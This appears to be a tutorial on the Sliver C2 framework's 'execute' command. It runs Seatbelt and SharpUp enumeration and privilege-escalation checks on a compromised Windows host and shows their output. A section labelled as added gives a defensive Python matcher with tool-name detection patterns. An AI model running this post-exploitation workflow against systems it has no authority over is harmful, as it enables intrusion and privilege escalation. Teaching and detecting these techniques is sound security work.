
Using the Execute Command

Start up the Windows session with the implant created earlier. Once the session contacts the server, be sure to switch to it with the use command.

While Sliver has a lot of built-in commands, it also includes an execute command, which runs a program on the target host.

[server] sliver (winsession) > help execute

Execute a program on the remote system

Usage:
======
execute [flags] command [arguments...]

Args:
=====
command     string         command to execute
arguments   string list    arguments to the command

Flags:
======
-h, --help                    display help
-S, --ignore-stderr           don't print STDERR output
-X, --loot                    save output as loot
-n, --name           string   name to assign loot (optional)
-o, --output                  capture command output
-P, --ppid           uint     parent process id (optional, Windows only) (default: 0)
-s, --save                    save output to a file
-E, --stderr         string   remote path to redirect STDERR to
-O, --stdout         string   remote path to redirect STDOUT to
-t, --timeout        int      command timeout in seconds (default: 60)
-T, --token                   execute command with current token (windows only)

I have placed the Seatbelt.exe file on my target host. Running that will gather some enumeration from the target.

sliver (winsession) > execute -o Seatbelt.exe -q OSInfo

[*] Output:
====== OSInfo ======

Hostname : WinLaptop
Domain Name :
Username : WinLaptop\steve
ProductName : Windows 10 Pro
EditionID : Professional
ReleaseId : 2009
Build : 22631.4169
BuildBranch : ni_release
CurrentMajorVersionNumber : 10
CurrentVersion : 6.3
Architecture : AMD64
ProcessorCount : 8
IsVirtualMachine : False
BootTimeUtc (approx) : 9/11/2024 2:18:04 AM (Total uptime: 24:16:55:12)
HighIntegrity : False
IsLocalAdmin : True
[*] In medium integrity but user is a local administrator - UAC can be bypassed.
CurrentTimeUtc : 10/5/2024 7:13:16 PM (Local time: 10/5/2024 3:13:16 PM)
TimeZone : Eastern Standard Time
TimeZoneOffset : -04:00:00
InputLanguage : US
InstalledInputLanguages : US
MachineGuid : 7d6861d3-b56b-44b8-83de-760039c6a2c1

sliver (winsession) >

A similar example, this time running SharpUp.exe:

sliver (winsession) > execute -o SharpUp.exe audit

[*] Output:

=== SharpUp: Running Privilege Escalation Checks ===

[*] In medium integrity but user is a local administrator- UAC can be bypassed.

[*] Audit mode: running an additional 15 check(s).
[!] Modifialbe scheduled tasks were not evaluated due to permissions.

=== Modifiable Folders in %PATH% ===
C:\Users\steve\Downloads\platform-tools\platform-tools


[*] Completed Privesc Checks in 25 seconds

sliver (winsession) >

Keep in mind that the execute command has a default timeout of 60 seconds. If the command you are executing takes longer than that, you need to allow additional time with the -t <int> flag.

-t, --timeout       int       command timeout in seconds (default: 60)

In this example, I set the timeout to 120 seconds:

sliver (winsession) > execute -o -t 120 Seatbelt.exe -q -group=system
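How the three executions shown above look from the defender's side, as an added example that is not part of the original page: a small matcher run over process-creation events. The events are constructed, use Sysmon Event ID 1 field names, and their paths and the renamed file name are assumptions made for the illustration.

```python
import re
from pathlib import PureWindowsPath

# Binary names taken from the commands on this page.
TOOL_NAMES = {"seatbelt.exe", "sharpup.exe"}
# Seatbelt's -group=<name> argument, as used in the timeout example.
SEATBELT_GROUP = re.compile(r"(?:^|\s)-group=\w+", re.IGNORECASE)

# Constructed events using Sysmon Event ID 1 field names. All paths and the
# renamed file name (updater.exe) are made up for this example.
EVENTS = [
    {"Image": r"C:\Users\steve\Seatbelt.exe", "OriginalFileName": "Seatbelt.exe",
     "CommandLine": "Seatbelt.exe -q OSInfo"},
    {"Image": r"C:\Users\steve\SharpUp.exe", "OriginalFileName": "SharpUp.exe",
     "CommandLine": "SharpUp.exe audit"},
    {"Image": r"C:\Users\steve\Seatbelt.exe", "OriginalFileName": "Seatbelt.exe",
     "CommandLine": "Seatbelt.exe -q -group=system"},
    {"Image": r"C:\Users\steve\updater.exe", "OriginalFileName": "Seatbelt.exe",
     "CommandLine": "updater.exe -q -group=system"},
    {"Image": r"C:\Windows\System32\auditpol.exe", "OriginalFileName": "auditpol.exe",
     "CommandLine": "auditpol.exe /get /category:*"},
]

def reasons(event):
    """Return the list of indicators one process-creation event matches."""
    hits = []
    image = PureWindowsPath(event.get("Image", "")).name.lower()
    original = event.get("OriginalFileName", "").lower()
    if image in TOOL_NAMES:
        hits.append("image-name")
    # The PE version resource keeps the original name after a file rename.
    if original in TOOL_NAMES and original != image:
        hits.append("renamed-binary")
    if SEATBELT_GROUP.search(event.get("CommandLine", "")):
        hits.append("seatbelt-group-arg")
    return hits

def scan(events):
    """Map event index -> matched indicators, skipping events with no match."""
    return {i: hits for i, e in enumerate(events) if (hits := reasons(e))}

if __name__ == "__main__":
    for index, hits in scan(EVENTS).items():
        print(index, EVENTS[index]["CommandLine"], hits)
```

The bare word audit is not used as an indicator on its own, which is why the auditpol.exe event produces no match.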